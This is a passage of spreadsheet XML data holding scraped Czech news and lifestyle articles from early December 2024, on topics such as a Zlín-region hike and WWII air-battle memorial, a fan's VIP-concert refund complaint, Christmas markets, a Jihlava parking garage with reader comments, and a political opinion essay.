chuť, snadnou přípravu a veselou oranžovou barvu, která k tomuto období […] zveřejněno: Ve středu 27. listopadu byl ve Valticích slavnostně vyhlášen absolutní šampion jubilejního 25. ročníku Salonu vín – Národní soutěže vín České republiky pro rok 2025. Nejlepším vínem […] zveřejněno: „Dobré víno je absolutním základem každého svařáku. Jen tak si zachová jedinečnou chuť i charakter,“ říká národní someliéra Klára Kollárová. Letos zkuste svařák jinak – […] zveřejněno: Scroll do vrcholu Používáme cookies, abychom vám poskytli nejlepší online zážitek. Více informací o tom, které soubory cookies používáme, nebo jejich vypnutí najdete v. Vytvořeno pomocí GDPR Cookie Compliance Přehled ochrany osobních údajů Tyto webové stránky používají soubory cookies, abychom vám mohli poskytnout co nejlepší uživatelský zážitek. Informace o souborech cookie se ukládají ve vašem prohlížeči a plní funkce, jako je rozpoznání, když se na naše webové stránky vrátíte, a pomáhají našemu týmu pochopit, které části webových stránek považujete za nejzajímavější a nejužitečnější. Nezbytně nutné soubory cookies Nezbytně nutný soubor cookie by měl být vždy povolen, abychom mohli uložit vaše preference nastavení souborů cookie. Povolit nebo zakázat cookies Pokud tento soubor cookie zakážete, nebudeme moci uložit vaše preference. To znamená, že při každé návštěvě těchto webových stránek budete muset soubory cookies znovu povolit nebo zakázat. Soubory cookies třetích stran Tyto webové stránky používají službu Google Analytics ke shromažďování anonymních informací, jako je počet návštěvníků webu a nejoblíbenější stránky. Povolení tohoto souboru cookie nám pomáhá zlepšovat naše webové stránky. Povolit nebo zakázat cookies Povolte prosím nejprve nezbytně nutné soubory cookies, abychom mohli uložit vaše preference! Zásady používání souborů cookie Autor: Markéta Pavelková Autor person Markéta Pavelková Rubrika transition_slide VAŘENÍ</t>
  </si>
  <si>
    <t>25</t>
  </si>
  <si>
    <t>24</t>
  </si>
  <si>
    <t>20241201_72_3477619933_09c422992e17420835c4.html</t>
  </si>
  <si>
    <t>09c422992e17420835c4</t>
  </si>
  <si>
    <t>V Šanově na Zlínsku byli svědky letecké bitvy. Pád letadla připomíná nevšední socha i pomník</t>
  </si>
  <si>
    <t>V Šanově na Zlínsku byli svědky letecké bitvy. Pád letadla připomíná nevšední socha i pomník Do Šanova ve Zlínském kraji se sice autem dostanete jen z jednoho směru. O to blíž je ale kopcům Bílých Karpat a husté síti turistických tras. Šanov leží jen pár kilometrů od hranic se Slovenskem , a byť jde o klidnou, malou vesnici, najdete v ní hned několik zajímavostí. Například roubenou stodolu, stopy po letecké bitvě i malé rodinné bistro plné zvířat. Z Šanova vedou dvě barvy turistických tras: modrá a zelená. A my se vydáme po zelené. Z centra obce vede kolem roubené stodoly z 19. století. A také kolem muzea Letecké bitvy nad Bílými Karpaty . Bitva se odehrála na konci druhé světové války, 29. srpna 1944. Poblíž moravsko-slovenských hranic při ní tehdy zemřelo 41 amerických letců, další skončili v zajetí německých vojáků a někteří měli štěstí, že je v lesích našli místní lidé. Muzeum založil Michael Žitník, nadšený amatérský historik, který v kopcích Bílých Karpat dlouhá léta hledal zbytky po sestřeleném americkém bombardéru. „Už v 95. roce jsem to tady nad Šanovem procházel, našel jsem nějaké náboje, součástky z radiovybavení, ale také pozůstatky vybavení jednotlivých letců,“ popisuje Michael Žitník. „Dá se toho spousta najít i dnes, ale jde je o malé úlomky, které třeba ani nejsou historicky cenné. Ty pak dávám k pomníku jako suvenýr pro turisty.“ Po asfaltové cyklostezce se dostaneme k prvnímu odkazu k bitvě. K Leteckému srdci. Kamennou sochu vytvořil v roce 2002 sochař Jaroslav Koléšek . Vznikla jako součást takzvaných soch v krajině. „Když se na ni podíváme z boku, tak vypadá opravdu jako lidské srdce, ale zepředu to je hvězdicový motor toho bombardéru,“ ukazuje Michael Žitník. Další různé tematické sochy stojí o kus dál nad Hostětínem . Od Leteckého srdce je to pak jen necelý půl kilometr k pomníku padlých letců. Cesta vede přes vyhlídkové místo, odkud je možné dohlédnout až na Vizovické vrchy. Občerstvení Na Mlýně Z bukového lesa v části zvané Jabloní se zpět do Šanova můžeme dostat buď po modré a udělat si tak okruh, který povede přes pastviny a přivede nás až místnímu kostelíku. Po zelené je to ale při vlhkém počasí příjemnější, asfaltová cyklostezka nás dovede zpět do obce. Na jejím druhém konci nás čeká další cíl naší cesty. Rodinné Občerstvení Na Mlýně. Před třemi lety si ho v garáži u domu otevřeli Michaela Mikesková a Zbyněk Rusek. „Nás na tu myšlenku přivedli Zbyňkovi rodiče, kteří říkali, že jejich snem bylo tady na cyklostezce čepovat pivo a prodávat zmrzlinu,“ vysvětluje Michaela. Místo ale není zdaleka jen o jídle a pití. Michaela se Zbyňkem totiž mají velké hospodářství plné zvířat a právě to láká návštěvníky. Lidé si můžou pohladit nebo nakrmit například lamy, prasátka, drůbež nebo oslici Rozárku. Šanov se nachází také v blízkosti Stezky Českem, a tak i místní bistro vítá stezkaře s otevřenou náručí a kromě občerstvení jim v Šanově nabízí i nocleh. Autor: Karolina Peřestá Autor Karolina Peřestá Rubrika transition_slide Výlety</t>
  </si>
  <si>
    <t>20241201_73_3477617624_11ba70b3bf5484d15a4f.html</t>
  </si>
  <si>
    <t>11ba70b3bf5484d15a4f</t>
  </si>
  <si>
    <t>Dyk v pantoflích a zvláštní afterparty: Fanynka žádá zpět 12 tisíc za VIP lístek</t>
  </si>
  <si>
    <t>Dyk v pantoflích a zvláštní afterparty: Fanynka žádá zpět 12 tisíc za VIP lístek Fanynka Vojty Dyka, která zaplatila téměř 12 tisíc korun za VIP lístek na koncert v O2 areně , kritizuje aroganci pořadatelů, zpěvákovu ležérnost a nevhodné prostředí afterparty. (Foto: Dagmar Světlovská) Níže přikládáme celé vyjádření fanynky: Zpěváka Vojtu Dyka jsem měla ráda jako talentovaného hudebníka, a protože mě celkem děsí velké davy lidí, koupila jsem si z těchto dvou důvodů vstupenku na koncert V. Dyka v O2 aréně 27.11.2024 v podobě VIP Experience za 12 000 Kč v naději na obvyklou VIP zónu (popisovali moji kamarádi, kteří byli v O2 aréně na jiných akcích), ve které nestojíte na chodbě, v průvanu a kolem proudícím davu fronty na limonádu, neotloukají vás lokty kolemjdoucí neurvalci a pod. Ne protože bych nevěděla, co s penězi, ale poprvé v životě jsem chtěla zažít slibovanou VIP péči. Jak otřesná byla (nejen) moje „VIP“ zkušenost, pochopíte z textu mého mailu pořadatelům, ve kterém žádám o vrácení peněz. Dobrý den, žádám okamžité vrácení peněz za vstupenku VIP Experience, protože nebylo splněno to, co jsem měla za tuto velice vysokou cenu dostat. 1) Setkání v 18 hodin se zúčastnil pouze Vojtěch Dyk , v teplákách, mikině a pantoflích. Nikdo z členů kapely se neobjevil, přestože mělo jít o setkání i se členy kapely Žádný welcome drink (ani obyčejná voda!), jak bývá zvykem, jen nabídka společné hromadné fotky (ve dvou skupinách) a pak po pár minutách unavených slov V. Dyka výkřik černovlasé dámy, která se ani nepředstavila: „Kdo je už vyfocený, ať jde dolů. Tam si můžete koupit merch.“ Jak brutální arogance pořadatele i interpreta! 2) To, co bylo prezentováno jako oficiální after party – za 9 500 Kč – bylo něco tak otřesného, že to nelze považovat za žádnou, ani tu nejmizernější, after party. Skutečná after party se odehrávala v uzavřeném soukromí o nějaké patro výše v tom samém hotelu. Tam jsme ale my, VIP Exsperience, neměli přístup. U vchodu do hotelu nebylo žádné označení, teprve, až jsme našli hostesku (zaměstnanec hotelu, který vůbec nic nevěděl), řekla nám, že si můžeme buď sednout do baru u recepce, kde si vše zaplatíme sami, nebo můžeme bar obejít a tam v prostoru, který připomínal černou, temnou noru, si dát občerstvení, které je v ceně after party. Toto občerstvení představovalo pár misek s olivami, pár misek s chipsy na dlouhém stolu u zdi a na malých stolcích uvnitř prostoru 1 mistička s arašídy a 1 sklenička s 3 kousky malých tyčinek. Nealkoholické nápoje jsme si museli otevřít sami, víno – cca 2 polévkové lžíce do velké sklenky – nalévali přítomní číšníci u stolku s alkoholickými nápoji 3) Nikdo z účinkujících se do 23.30 hodin nedostavil na tuto „oficiální“ after party v depresivním, temném a tak spoře osvětleném prostoru, že nebylo vidět do tváře ani lidem stojícím metr od vás. Hosteska nebyla schopná odpovědět, na četné dotazy, jestli někdo přijde apod. 4) Otřesná úroveň „čehosi“, co se rozhodně nedá nazvat párty, absolutně neodpovídá ceně 9 500 Kč, proto žádám o vrácení těchto peněz. Částku 9 500 Kč mi v rámci reklamace pošlete do týdne, tj. do 5.12.2024, zpět na můj bankovní účet č….. V opačném případě podám trestní oznámení na pořadatele za podvod. A také se o celou záležitost a tuto příšernou zkušenost podělím s tiskem. A vzhledem k tomu, že mi otřesný zážitek z „after party“ vzal i zbytky radosti z koncertu V.Dyka, ocenila bych, kdybyste mi vrátili celou částku, tj. 12000 Kč. Navíc – V. Dyk ve videích zvoucích na tento koncert opakovaně prezentoval konkurz na hosty jeho koncertu. Tím úmyslně vytvářel v lidech dojem, že na koncertě bude hodně hostů, ale nakonec se ukázalo, že šlo o fiktivní konkurz a na koncertě nikdo z hostů z videí nebude. To se dá s úspěchem považovat za klamavou reklamu, což je trestný čin. A fakt, že v závěru koncertu pozval V.Dyk na podium asi 30 osob, které hrály ve fiktivním konkurzu a napomáhaly tak klamavé reklamě, bylo nejen zavlečení dalších osob do protiprávního jednání, ale současně i velmi krutá arogance. Zpupně nám ukázal, s kým půjde slavit na after party, kterou jsme mu zaplatili my, které na ni nepustil. A nápad přizvat na podium do závěrečné „děkovačky“ i Jiřinu Bohdalovou , která jen kradla potlesk muzikantům (nevystupovala na koncertu, stejně jako ti ostatní z videí, co stáli vedle ní), byl vrcholem projevů arogantního pohrdání fanoušky, které předvedl V.Dyk a jeho organizační/produkční tým. Kroucení zadkem J. Bohdalové při děkovačce, kdy se držela za ruku V.Dyka, aby se vůbec udržela na nohách, bylo na pozvracení se. Koupila jsem si VIP vstupenku na koncert V. Dyka , ne na „taneční vystoupení“ 93 leté stařeny a defilé kamarádů V.Dyka, s kterými pak šel slavit – za moje peníze, respektive za peníze VŠECH, kteří si koupili VIP Experience. Ocením proto, když mi vrátíte celou částku, tj. 12 000 Kč, investovanou do koncertu V. Dyka . Koncertu, jehož program/obsah neodpovídal pozvánkám. ……… P.S. Včera jsem tuto stížnost napsala na facebookové profily V. Dyka a jeho kapely. Místo jakékoliv reakce smazali můj komentář a mě na fb zablokovali. Tím jen potvrdili, že VIP experience podvod byl předem naplánovaný a že lidmi, díky kterým mají příjmy takové, jaké mají, jen arogantně pohrdají. Článek Dyk v pantoflích a zvláštní afterparty: Fanynka žádá zpět 12 tisíc za VIP lístek se nejdříve objevil na AC24.cz .</t>
  </si>
  <si>
    <t>20241201_74_3477632910_373fe080a7074bd6296b.html</t>
  </si>
  <si>
    <t>373fe080a7074bd6296b</t>
  </si>
  <si>
    <t>Obdarujte své blízké stylovými dárky Pilsner Urquell!</t>
  </si>
  <si>
    <t>Obdarujte své blízké stylovými dárky Pilsner Urquell! Máte ve svém okolí milovníka piva Pilsner Urquell? Nebo hledáte jen originální dárek pro vašeho manžela, tatínka či dědečka? Pak mu pořiďte jedinečný vánoční dárek přímo z Prazdroje. Na www.eshop.prazdroj.cz! Najdete zde vše od stylového oblečení, přes pivní sklo, vánoční čepice a svetry až po dárkové poukazy na prohlídky a zážitky v Plzeňském Prazdroji. Bestsellerem jsou pak personalizované pivní dárky se jmény vašich blízkých, jako je například pivní sklenice, na které vám vygravírují jméno obdarovaného. Na www.eshop.prazdroj.cz si zkrátka vybere každý! Originální dárky Pilsner Urquell najdete také v dárkové prodejně na nádvoří Prazdroje nebo ve stánku v OC Olympia Plzeň či v OC Nový Smíchov v Praze . „Vánoce a značka Pilsner Urquell k sobě nerozlučně patří, a proto již několikátým rokem přinášíme milovníkům naší značky vánoční dárky od Pilsner Urquell do vybraných nákupních center. Samozřejmostí je pak naše nabídka v dárkové prodejně přímo v Prazdroji nebo na našem e-shopu. Pořídíte zde skvělé dárky pro vaše manžele, tatínky, dědečky a všechny, kteří mají rádi naše pivo . Vybírat můžete nejen z krásných balení vánočního piva s různými dárky uvnitř, ale třeba i z vánočních svetrů, ponožek, čepic a dalších drobností, které pod stromečkem zaručeně potěší,“ říká Pavla Mášková , manažerka návštěvnických a obchodních služeb Plzeňského Prazdroje. Autor: TRIMA NEWS, s.r.o., libor@drbna.cz</t>
  </si>
  <si>
    <t>20241201_75_3477609059_c18e0fd049e9952c430b.html</t>
  </si>
  <si>
    <t>c18e0fd049e9952c430b</t>
  </si>
  <si>
    <t>Létaly po nás podprsenky i lahve tvrdého. Lou Fanánek a Michal David popsali divoké koncerty</t>
  </si>
  <si>
    <t>Létaly po nás podprsenky i lahve tvrdého. Lou Fanánek a Michal David popsali divoké koncerty Koncerty, které se nedaly dokončit, fanynky, co házely na podium spodní prádlo, nebo opilí fanoušci, kteří počastovali interpreta lahví alkoholu , popřípadě kelímkem piva . I tak dobu „devadesátkové“ anarchie popisují další hosté podcastu Devadesátky v Česku Michal David a Lou Fanánek Hagen . Přihlaste se k odběru novinek našeho zpravodajského portálu CNNPrima.cz a buďte neustále v obraze. Denně vám přes 200 reportérů a redaktorů přináší ty nejdůležitější a nejzajímavější zprávy z domova i ze zahraničí. ✉️ https://cnn.iprima.cz/newsletter 📲 Sledujte CNN Prima NEWS na sociálních sítích: Facebook : https://facebook.com/cnnprima Instagram: https://instagram.com/cnnprima Twitter : https://twitter.com/cnnprima 💻 Navštivte web CNN Prima NEWS na https://cnnprima.cz #cnnprimanews #cnnprima</t>
  </si>
  <si>
    <t>20241201_76_3477866297_67cec1d2336283ce7d25.html</t>
  </si>
  <si>
    <t>67cec1d2336283ce7d25</t>
  </si>
  <si>
    <t>VÁNOČNÍ ŠUMPERK 2024 - VÁNOČNÍ ŠUMPERK 2024 | Gastronomické akce</t>
  </si>
  <si>
    <t>VÁNOČNÍ ŠUMPERK 2024 - VÁNOČNÍ ŠUMPERK 2024 | Gastronomické akce Náměstí Míru , 78701 Šumperk , Šumperk , Olomoucký kraj , Česko Poslední změna: 26.11.2024 Náměstí Míru , 78701 Šumperk , Šumperk , Olomoucký kraj , Česko neděle 01. prosince Od 01.12.2024 16:00 do 26.12.2024 00:00 hod. Náměstí Míru , Šumperk , Šumperk | Mapa Informace o trase: Tisk KML GPX VÁNOČNÍ ŠUMPERK 2024 Město Šumperk zve na Vánoční Šumperk 2024! Prostranství před šumperskou radnicí bude letos již počtvrté hostit akci Vánoční Šumperk . Atmosféru na tržišti navodí především kulturní program, tradiční stánkový prodej i vánoční výzdoba. Po oficiálním otevření trhů 1. prosince, které je již tradičně spojeno s rozsvícením stromu u radnice, se v následujícím adventním prostředí budete moci těšit na koncerty a vystoupení různých kapel a interpretů. Samotný kulturní program pak představí nejen oblíbené regionální kapely, ale nabídne rovněž vystoupení řady přespolních účinkujících. Na podiu budou také po tři středeční odpoledne vystupovat děti z místních mateřských i základních škol a spolků, které se pochlubí svými vánočními besídkami. Vánoce u radnice potrvají do 26. prosince. Provozní doba trhů bude od 11 do 21 hodin (pouze na Štědrý den do 14 hodin), v pátky, v den zahájení a na Mikuláše bude prodloužena do 22 hodin. Bližší informace o programu naleznete na Vánoční Šumperk 2024 - Vánoční Šumperk 2024 Město Šumperk zve na Vánoční Šumperk 2024! Prostranství před šumperskou radnicí bude letos již počtvrté hostit akci Vánoční Šumperk . Atmosféru na tržišti navodí především kulturní program, tradiční stánkový prodej i vánoční výzdoba. Další Vánočky se předávají do 14:30 Vyhodnocení soutěže 15:30Vrbenská vánočka – soutěž o nejlepší vrbenskou vánočku s ochutnávkou. Počet míst: 1 Havířské speciality v prostředí příjemné koliby Chystáte se na výlet do Jeseníků a rádi byste si pochutnali na nějaké místní specialitě? Vydejte se do Sobotína a navštivte Motorest Permoník, který najdete na hlavním tahu mez ... ( více ) Počet míst: 80 Romantická kavárna v srdci resortu. Pomyslným srdcem resortu je kavárna Sidonie, která je propojena s recepcí hotelu Sidonie. Podává se zde lahodná káva a řada chutných zákusků. Využít můžete jak vnitřního, tak i venkovního posezen ... ( více ) Vzdálenost: 9.82 km Pro příjemné osvěžení během hry i oslavy ve sportovním duchu Vedle restaurace Josef najdete moderní bowlingový bar se širokou nabídkou alkoholických i nealkoholických nápojů. Přijďte se osvěžit během hry bowlingu, stolní ... ( více ) Počet míst: 50 Pro skutečné gentlemany Plánujete pánskou rozlučku se svobodou nebo byste rádi pozvali své obchodní partnery na příjemné posezení se skleničkou lahodného vína či vynikajícího rumu? Zarezervujte si zámeckou vinárnu Hubert, kde s ... ( více ) Počet míst: 25 Pro výjimečné soukromé akce i příjemné posezení Milujete barokní styl a rádi byste si pochutnali na lahodných pokrmech v zámeckém prostředí? Nebo máte v plánu si v resortu Sobotín uspořádat svatbu a rádi byste připravili pro své hosty nezapo ... ( více ) Počet míst: 60 Moderní restaurace Josef je hlavní restaurací celého resortu Sobotín , která se nachazí přímo vedle víceúčelové haly, se kterou je propojena skleněnou stěnou. Do restaurace Josef může zavítat i veřejnost a pochutnat si na obědec ... ( více ) Počet míst: 200 Vzdálenost: 9.82 km Rychlý kontakt Euroregion Praděd Nové doby 111 79326 Vrbno pod Pradědem IČ: 69594074 DIČ: CZ69594074 +420 558 271 314 petra.dudikova@europraded.cz Datová schránka: 6u9rera Oficiální web Euroregionu Praděd Úřední hodiny: pondělí až pátek 07:00 - 15:30 Další kontakty Rada pro cestovní ruch Jan Krkoška , předseda +420 602 281 547 jkrkoska@mukrnov.cz Petra Dudíková, manažerka +420 607 025 629 petra.dudikova@europraded.cz Ing. Pavla Müllerová, referent cestovního ruchu pavla.mullerova@europraded.cz Spojte se s námi Přihlašte se do našeho newsletteru pokud chcete mít aktuální informace o našich akcích. Pro odhlášení vložte e-mail znovu. Souhlasím se zasíláním novinek VÁNOČNÍ ŠUMPERK 2024 | Gastronomické akce | Rodinné Jeseníky © 2010-2024 Všechna práva vyhrazena. Autor: Marek Kačor Autor person Marek Kačor</t>
  </si>
  <si>
    <t>35</t>
  </si>
  <si>
    <t>20241201_77_3477592952_ee658dff6f202ca51391.html</t>
  </si>
  <si>
    <t>ee658dff6f202ca51391</t>
  </si>
  <si>
    <t>Parkovací dům za Billou nestihnou</t>
  </si>
  <si>
    <t>Parkovací dům za Billou nestihnou PARKOVACÍ dům za Billou by měl být dokončen v první polovině roku 2026. Foto: Pavel Bajer Pavel Bajer tel.:+420 567 578 036 mobil:+420 736 194 030 bajer@jihlavske-listy.cz Parkovací dům za Billou po dokončení nové Horácké multifunkční arény (HMA) v Jihlavě fungovat patrně nebude. Na dotazy JL to vyplynulo z odpovědí společnosti Icom transport , která bude stavbu realizovat. Město počítá, že HMA by mohla začít fungovat v říjnu příštího roku. Rovněž výstavba parkovacího domu by měla začít v roce 2025. Společnost již dříve avizovala, že by dům chtěla otevřít souběžně s HMA. Už nyní to vypadá, že se původní předpoklad nenaplní. „Vše záleží na průběhu stavebního řízení a délce výstavby, nyní se termín dokončení jeví v první polovině roku 2026,“ sdělila JL Marcela Svobodová ze společnosti Icom transport . Jak doplnila, pro stavbu parkovacího domu se nyní zpracovává projektová dokumentace. Její slova potvrdil primátor Jihlavy Petr Ryška ( ODS ). „Dolaďují se tam věci kolem projektové dokumentace, aby všechny subjekty, které jsou v okolí, byly spokojeny, aby s tím souhlasily,“ vyjádřil se na dotaz JL. I primátor připustil, že by se výstavba domu mohla protáhnout. Pro Ryšku je však důležité, aby se s realizací stavby začalo na jaře příštího roku. Icom transport předpokládá, že nový parkovací dům bude stát mezi 250 až 300 miliony korun. Nabídnout má 578 míst v sedmi patrech. Zájem o místa mají již nyní úřady a instituce. Na jedné z tiskových konferencí města například rektor Vysoké školy polytechnické (VŠPJ) Zdeněk Horák naznačil, že by jim parkovací dům mohl pomoci s místy, které škola ztratí v důsledku plánované výstavby nových kolejí. Výstavbě parkovacího domu předcházejí směny pozemků mezi městem a Icom transport. Parkovací dům a jeho okolí mohou zasahovat i na pozemky jiných vlastníků, jako je například Obchodní centrum Billa. V okruhu zamýšlené výstavby se nacházejí i dva pozemky, které mají stejné dva vlastníky. Podle katastrální mapy jsou jimi pražská společnost MAKO a občan Spolkové republiky Německo Johann Králíček. Na Johanna Králíčka JL nenalezly žádný kontakt. Zástupci MAKO nám na e-mail neodpověděli. Podle obchodního rejstříku v čele společnosti MAKO stojí tři jednatelé. Jsou jimi Andreas Kejmar a Marlene Kejmar, kteří mají jako bydliště uvedenu Telč . Třetím jednatelem je Francis Kejmar s trvalým pobytem na Kubě . ....................pro HMA není parkovací dům důležitý......pan Beke říká, že staví HMA v centru, aby návštěvníci mohli jezdit MHD a chodit pěšky......máme taky ve městě sdílená kola......Rakušáci z Vídně mají jezdit autobusy nebo vlakem............ km | 2024-12-01 19:44:28 | Reagovat PRÁVĚ DNES, právě nyní, každá slina ANONYMA pro Putina dobrá Vážení anonymové račte shlédnout, případně pochopit a komentář? Těžko, že? Dina Štěrbová , spoluzakladatelka organizace Czech Hospital První profesor ekologie OTAKAR ne vyhánět Putinovým bombardováním --------------------------------------------- ........ rusácky dům.........v 68 se tu proháněli na tancích a stříleli do lidi.... smrděli a roztahovali se tu přes 20 let....... km | 2024-10-10 14:00:30 | Reagovat Zdeněk | 2024-12-01 21:04:37 | Reagovat .......ano, na tancích se tu proháněli a po lidech stříleli vaší dnešní přátelé.........nejen dnešní........byla na otevření místního kremlu rusacka delegace???............. km | 2024-12-02 05:16:26 | Reagovat PŘIČINLIVÝ RUSÁK BY SE MĚL ANO - NYMNĚ VYZPOVÍDAT BYL - NEBYL MOHL OBYČEJNÝ TROUBA BÝ NA SCHŮZI ARCHITEKTŮ S RUDOU OBČANKOU? schůze byla svolána Dům umění v Brně suodruzi vešli do konferenčního sálu asi po hodině se byli "připuštěni" Zdeněk | 2024-12-02 23:58:59 | Reagovat ........... stejně to musí být pocit......... jít s pytlíčkem žluči oznamovat bližního svého za pravdu........... musí jít o ryzi charakter....... km | 2024-12-03 04:35:17 | Reagovat ANO - NYM HRDINA ZA KAŽVÝM SVÝM ANONYMNÍM SLOVEM SI STOJÍ SE SVOU OBČANSKOU CTÍ!!!VEM Jistě rád vysvětlí, v jednom ze svých bohatých komentářů pod stromeček proč píše pod třemi pseudo-anonymy CUI BONO a píše lži, nebo dokáže mimo několika flašek piva uvést pramen - tedy odkud vzal? ------------------------------------------------------------- ........... stejně to musí být pocit......... jít s pytlíčkem žluči oznamovat bližního svého za pravdu........... musí jít o ryzi charakter....... km | 2024-12-03 04:35:17 | Reagovat Zbabělý Puti-mír nejenom mění identitu, ale také s cílem šířit nenávist přejmenovává „Ukrajinský dům“</t>
  </si>
  <si>
    <t>919</t>
  </si>
  <si>
    <t>1.19</t>
  </si>
  <si>
    <t>20241201_78_3477558822_ef8710376abb1a5c094e.html</t>
  </si>
  <si>
    <t>ef8710376abb1a5c094e</t>
  </si>
  <si>
    <t>„Nech mě,“ pláče zoufalé dítě! Znepokojivé záběry opilé matky z TikToku!</t>
  </si>
  <si>
    <t>&amp;amp;#8222;Nech mě,&amp;amp;#8220; pláče zoufalé dítě! Znepokojivé záběry opilé matky z TikToku! alkohol matka TikTok Na sociálních sítích se objevilo video, které vyvolalo silné emoce a rozhořčení veřejnosti. Během živého vysílání se objevila žena, která byla zjevně pod vlivem alkoholu . Její chování, které bylo zachyceno na záznamu, vzbudilo obavy a mnoho lidí se začalo ptát, zda je dítě v jejím okolí v bezpečí. Video, které bylo sdíleno na TikToku, ukazuje matku, jak se potácí po místnosti a snaží se komunikovat se svým dítětem, které se evidentně snaží bránit její přítomnosti. Reklama ♬ původní zvuk – Psychiatrická_léčebna_ Bohnice V záznamu je patrné, že žena, identifikovaná jako Verunka_vs, se pohybuje po místnosti s velkými obtížemi. Její motorické dovednosti jsou narušeny a v jednu chvíli dokonce leží na zemi. Zatímco se snaží navázat kontakt se svým dítětem, jeho pláč a zoufalé výkřiky jasně naznačují, že se cítí ohroženo. Dítě opakovaně prosí „ Nech mě, “ a zdá se, že se matce snaží uniknout. Tato situace vyvolala u diváků silné reakce a mnozí z nich začali vyjadřovat obavy o bezpečnost dítěte. Reakce veřejnosti Jakmile se video začalo šířit, okamžitě vyvolalo vlnu reakcí na sociálních sítích. Uživatelé se začali ptát, zda by neměli kontaktovat policii nebo sociální služby, aby se situací zabývaly. Mnoho lidí vyjádřilo znepokojení nad tím, že matka je pod vlivem alkoholu a její chování by mohlo mít vážné následky pro dítě. Tato situace vedla k intenzivní diskusi o zodpovědnosti rodičů a o tom, jak by měla veřejnost reagovat na podobné případy. Omluva a sebereflexe Následující den po incidentu se žena rozhodla na svém profilu na TikToku poskytnout vysvětlení. Přiznala, že má vážný problém s alkoholem a že se snaží najít pomoc. Uvedla, že si je vědoma svých chyb a že její chování jako matky bylo špatné. „ Myslím, že potřebuji pomoc, že jsem si toho naložila moc, “ řekla. Její slova vyvolala smíšené reakce. ♬ původní zvuk – Psychiatrická_léčebna_ Bohnice Důsledky chování Situace, která se odehrála, vyvolala otázky o tom, jak se má podobná chování řešit. Mnozí lidé začali diskutovat o nutnosti zásahu sociálních služeb a policie, aby se zajistila bezpečnost dítěte. Odborníci na rodinné vztahy a sociální služby varovali před nebezpečím, které může vzniknout, pokud rodiče bojují s problémy s alkoholem . Je důležité, aby rodiče dostali potřebnou podporu, ale také aby bylo zajištěno, že děti nebudou vystaveny nebezpečným situacím. Zdroj: eXtra.cz Reklama Autor: Tereza Procházková Autor person Tereza Procházková</t>
  </si>
  <si>
    <t>19350</t>
  </si>
  <si>
    <t>9170</t>
  </si>
  <si>
    <t>20241201_79_3477483761_4ba5baab29cca752d10a.html</t>
  </si>
  <si>
    <t>4ba5baab29cca752d10a</t>
  </si>
  <si>
    <t>Jak chutná moc? Pořád stejně</t>
  </si>
  <si>
    <t>Jak chutná moc? Pořád stejně Pan Michal Wizard ve svém článku popisuje chování současných politiků a konfrontuje je s Mňačkovým románem ze 60. let. Změnilo se za ty roky vůbec něco? Obávám se, že pokud ano, tak leda k horšímu a pravidla jsou nastavená tak, že tento vývoj přímo podporují. Politici mají po zvolení čtyřleté definitivum, aniž by museli hnout prstem. Nemají vlastně vůči ničemu a nikomu žádnou odpovědnost a pravidla, která si schválili, jsou taková, že se postavili nad zákon a mimo společnost. Nebudu tu znovu opakovat to, co napsal již pan Wizard. Popsal celou situaci docela trefně, ale velmi, velmi jemně, jako by se bál na některé věci poukázat. Já jsem drzoun, tak to udělám a pojmenuji to, co si myslím, že korupci mocí přímo podporuje. Čtyřleté volební období je tak akorát na to, abyste mohli připravit změny a realizovat je. To je asi v pořádku. Kumulace funkcí je až to poslední co by vadilo. Co ovšem vadí, a to zcela zásadně, je, že politik není nikomu odpovědný a je po celé volební období prakticky neodvolatelný. Je to práce jako každá jiná, takže pravidelná docházka do zaměstnání by měla být základem. Jenže když náš poslanec bude chodit do parlamentu spát (pokud tam vůbec přijde), nic se neděje. Aktivně nepracuje, ale opět se nic neděje. Kde je odpovědnost vůči občanům obecně a vůči těm, kteří ho zvolili, obzvláště? Nikde! Tento základní princip demokracie u nás není naplněný. Řešení je nasnadě: možnost odvolat politika jeho voliči. Takový ostrakismus v moderním pojetí. Já ho volil, mě je odpovědný, já ho mohu odvolat. Další věcí je odpovědnost za ekonomiku a státní finance. To se netýká jen ministra financí, ale všech poslanců, protože někdo zákony navrhuje, ale oni jsou tím, kdo je schvaluje. Oni by měli být tou pojistkou, která řekne: „Ano!“ nebo „Ne!“. To znamená, že by se měli ve vztahu k financím chovat odpovědně a účelně je vynakládat. K tomu je bohužel nic nenutí ani v případě jejich osoby. Plat jako takový vůbec nemají špatný. Ale to není to, co by vadilo. Co je ovšem podstatné, jsou poslanecké paušály a náhrady. Dokud nebudou nuceni každý výdaj dokladovat, nebude je nic nutit k ekonomickému vynakládání prostředků. Máš poslaneckou kancelář? Dolož kolik a podle jaké smlouvy za ni platíš a zda je to suma v tomto místě obvyklá. Jedeš na služební cestu? Dolož jízdenkami nebo „cesťákem“ v případě použití Tvého auta. Jestliže jedeš autem, které patří Tvojí straně, vyřiď si to s ekonomy Tvé partaje. Že by to bylo moc složité a nákladné? Těžko! V sedmdesátých letech jeden odštěpný závod Čokoládoven měl v průměru 1000 zaměstnanců. Na celou agendu týkající se fabriky tam byly čtyři účetní a jedna mzdová účetní a světe div se, stíhaly to! Přitom to bylo v době, kdy se nám o digitalizaci mohlo tak akorát zdát. Že by to ušetřilo nemalé finanční prostředky, je nasnadě. A poslanci by možná konečně pochopili, co je účelné vynakládání prostředků. A nakonec, třešnička na dortu, nepostižitelnost poslanců. Neomezená imunita po celou dobu jejich mandátu, která je de facto staví nad zákon. Nic proti poslanecké imunitě jako takové, ale měla by se vztahovat pouze za činy na půdě parlamentu. Jakmile sejde poslanec z posledního schodu na chodník, měl by být občanem se stejnými právy a povinnostmi jako každý jiný. V Británii klidně seberou papíry členu královské rodiny nebo členovi Sněmovny lordů za rychlou jízdu nebo alkohol za volantem. U nás? Nenechte se vysmát! Pocit nepostižitelnosti, který poslanci u nás mají, se jenom přetaví do ještě větší arogance moci. Tak jsem tu hezky popsal, „co by, kdyby“. Jsem si ovšem plně vědomý toho, že pokud by k mnou popsaným změnám došlo, byl by to patrně první případ v lidských dějinách, kdy si kapři dobrovolně vypustili rybník. Očekávat něco takového je velmi nereálné. Frustrace občanů z politiky je přirozeným následkem toho, co jsem popsal. Jestliže si politici stěžují na malý zájem občanů o politiku a malý zájem o volby (samozřejmě hlavně o jejich stranu), myslím, že by se měli podívat do zrcadla. Tam najdou příčinu toho nezájmu. Poptávku určuje nabídka a ta je v tomto případě prachbídná. Nedivím se, že mnoho občanů využije možnosti k volbám nejít. Výběr stojí za… nestojí za nic. Argument, že pořád je lepší volit menší zlo než nevolit vůbec, neberu. Nechci volit žádné zlo, ani malé, ani velké. Chci volit budoucnost, která přinese lepší život. Zlo si všichni nechte od cesty! S 